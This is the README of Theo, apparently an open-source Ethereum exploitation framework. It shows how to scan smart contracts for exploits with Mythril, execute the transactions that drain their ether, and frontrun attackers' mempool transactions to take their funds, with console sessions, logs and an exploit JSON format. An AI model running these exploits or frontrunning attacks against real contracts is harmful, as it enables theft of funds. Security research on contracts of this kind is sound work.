Theo - Ethereum Recon and Exploitation Tool


Theo aims to be an exploitation framework and a blockchain recon and interaction tool.

Features:
  • Automatic smart contract scanning which generates a list of possible exploits.
  • Sending transactions to exploit a smart contract.
  • Transaction pool monitor.
  • Web3 console
  • Frontrunning and backrunning transactions.
  • Waiting for a list of transactions and sending out others.
  • Estimating gas for transactions means only successful transactions are sent.
  • Disabling gas estimation will send transactions with a fixed gas quantity.
He knows Karl from work.
Theo's role is to fight script kiddies that try to be leet hackers. He can listen to them trying to exploit his honeypots and make them lose their funds, for his own gain.
"You didn't convey me along for my charming personality."

Install
Theo is available as a PyPI package:
$ pip install theo
$ theo --help
usage: theo [-h] [--rpc-http RPC_HTTP] [--rpc-ws RPC_WS] [--rpc-ipc RPC_IPC]
            [--account-pk ACCOUNT_PK] [--contract ADDRESS]
            [--skip-mythril SKIP_MYTHRIL] [--load-file LOAD_FILE] [--version]

Monitor contracts for balance changes or tx pool.

optional arguments:
  -h, --help            show this help message and exit
  --rpc-http RPC_HTTP   Connect to this HTTP RPC (default:
                        http://127.0.0.1:8545)
  --account-pk ACCOUNT_PK
                        The account's private key (default: None)
  --contract ADDRESS    Contract to monitor (default: None)
  --skip-mythril SKIP_MYTHRIL
                        Don't try to find exploits with Mythril (default:
                        False)
  --load-file LOAD_FILE
                        Load exploit from file (default: )
  --version             show program's version number and exit

RPC connections:
  --rpc-ws RPC_WS       Connect to this WebSockets RPC (default: None)
  --rpc-ipc RPC_IPC     Connect to this IPC RPC (default: None)
Install from sources
$ git clone https://github.com/cleanunicorn/theo
$ cd theo
$ virtualenv ./venv
$ . ./venv/bin/activate
$ pip install -r requirements.txt
$ pip install -e .
$ theo --help
Requirements:
  • Python 3.5 or higher.
  • An Ethereum node with RPC available. Ganache works really well for testing or for validating exploits.

Demos

Find exploit and execute it
Scan a smart contract, find exploits, exploit it:
  • Start Ganache as our local Ethereum node
  • Deploy the vulnerable contract (happens in a different window)
  • Scan for exploits
  • Run exploit


Frontrun victim
Set up a honeypot, deploy the honeypot, wait for the attacker, frontrun:
  • Start geth as our local Ethereum node
  • Start mining
  • Deploy the honeypot
  • Start Theo and scan the mem pool for transactions
  • Frontrun the attacker and steal his ether


Usage

Help screen
It's a good idea to check the help screen first.
$ theo --help
usage: theo [-h] [--rpc-http RPC_HTTP] [--rpc-ws RPC_WS] [--rpc-ipc RPC_IPC]
            [--account-pk ACCOUNT_PK] [--contract ADDRESS] [--skip-mythril]
            [--load-file LOAD_FILE] [--version]

Monitor contracts for balance changes or tx pool.

optional arguments:
  -h, --help            show this help message and exit
  --rpc-http RPC_HTTP   Connect to this HTTP RPC (default:
                        http://127.0.0.1:8545)
  --account-pk ACCOUNT_PK
                        The account's private key (default: None)
  --contract ADDRESS    Contract to interact with (default: None)
  --skip-mythril        Skip scanning the contract with Mythril (default:
                        False)
  --load-file LOAD_FILE
                        Load exploit from file (default: )
  --version             show program's version number and exit

RPC connections:
  --rpc-ws RPC_WS       Connect to this WebSockets RPC (default: None)
  --rpc-ipc RPC_IPC     Connect to this IPC RPC (default: None)

Symbolic execution
A list of exploits is automatically identified using mythril.
Start a session by running:
$ theo --contract=<address> --account-pk=<private-key>
Scanning for exploits in contract: 0xa586074fa4fe3e546a132a16238abe37951d41fe
Connecting to HTTP: http://127.0.0.1:8545.
Found exploits(s):
[Exploit: (txs=[Transaction {Data: 0xcf7a8965, Value: 1000000000000000000}])]

A few objects are available in the console:
- `exploits` is an array of loaded exploits found by Mythril or read from a file
- `w3` an initialized instance of web3py for the provided HTTP RPC endpoint

Check the readme for more info:
https://github.com/cleanunicorn/theo

>>>
It will analyze the contract and will find a list of available exploits.
You can see the available exploits found. In this case one exploit was found. Each exploit is an Exploit object.
>>> exploits[0]
Exploit: (txs=[Transaction: {'input': '0xcf7a8965', 'value': '0xde0b6b3a7640000'}])

Running exploits
The exploit steps can be run by calling .execute() on the exploit object. The transactions will be signed and sent to the node you're connected to.
>>> exploits[0].execute()
2019-07-22 11:26:12,196 - Sending tx: {'to': '0xA586074FA4Fe3E546A132a16238abe37951D41fE', 'gasPrice': 1, 'gas': 30521, 'value': 1000000000000000000, 'data': '0xcf7a8965', 'nonce': 47}
2019-07-22 11:26:12,200 - Waiting for 0x41b489c78f654cab0b0451fc573010ddb20ee6437cdbf5098b6b03ee1936c33c to be mined...
2019-07-22 11:26:16,337 - Mined
2019-07-22 11:26:16,341 - Initial balance:      1155999450759997797167 (1156.00 ether)
2019-07-22 11:26:16,342 - Final balance:        1156999450759997768901 (1157.00 ether)

Frontrunning
You can start the frontrunning monitor to listen for other hackers trying to exploit the honeypot.
Use .frontrun() to start listening for the exploit and, when it is found, send a transaction with a higher gas price.
>>> exploits[0].frontrun()
2019-07-22 11:22:26,285 - Scanning the mem pool for transactions...
2019-07-22 11:22:45,369 - Found tx: 0xf6041abe6e547cea93e80a451fdf53e6bdae67820244246fde44098f91ce1c20
2019-07-22 11:22:45,375 - Sending tx: {'to': '0xA586074FA4Fe3E546A132a16238abe37951D41fE', 'gasPrice': '0x2', 'data': '0xcf7a8965', 'gas': 30522, 'value': 1000000000000000000, 'nonce': 45}
2019-07-22 11:22:45,380 - Waiting for 0xa73316daf806e7eef83d09e467c32ce5faa239c6eda3a270a8ce7a7aae48fb7e to be mined...
2019-07-22 11:22:56,852 - Mined
"Oh, my God! The quarterback is toast!"
This works really well for some specially crafted contracts or other vulnerable contracts, as long as you make sure frontrunning is in your favor.

Load transactions from file
Instead of identifying the exploits with mythril, you can specify the list of exploits yourself.
Create a file that looks like this exploits.json:
[
    [
        {
            "name": "claimOwnership()",
            "input": "0x4e71e0c8",
            "value": "0xde0b6b3a7640000"
        },
        {
            "name": "retrieve()",
            "input": "0x2e64cec1",
            "value": "0x0"
        }
    ],
    [
        {
            "name": "claimOwnership()",
            "input": "0x4e71e0c8",
            "value": "0xde0b6b3a7640000"
        }
    ]
]
This one defines two exploits: the first one has two transactions and the second one only has one transaction.
You can load it with:
$ theo --load-file=./exploits.json

Troubleshooting

openssl/aes.h: No such file or directory
If you get this error, you need the libssl source libraries:
    scrypt-1.2.1/libcperciva/crypto/crypto_aes.c:6:10: fatal error: openssl/aes.h: No such file or directory
     #include <openssl/aes.h>
              ^
    compilation terminated.
    error: command 'x86_64-linux-gnu-gcc' failed with exit status 1

    ----------------------------------------
    Command "/usr/bin/python3 -u -c "import setuptools, tokenize;__file__='/tmp/pip-build-5rl4ep94/scrypt/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" install --record /tmp/pip-mnbzx9qe-record/install-record.txt --single-version-externally-managed --compile" failed with error code 1 in /tmp/pip-build-5rl4ep94/scrypt/
On Ubuntu you can install them with:
$ sudo apt install libssl-dev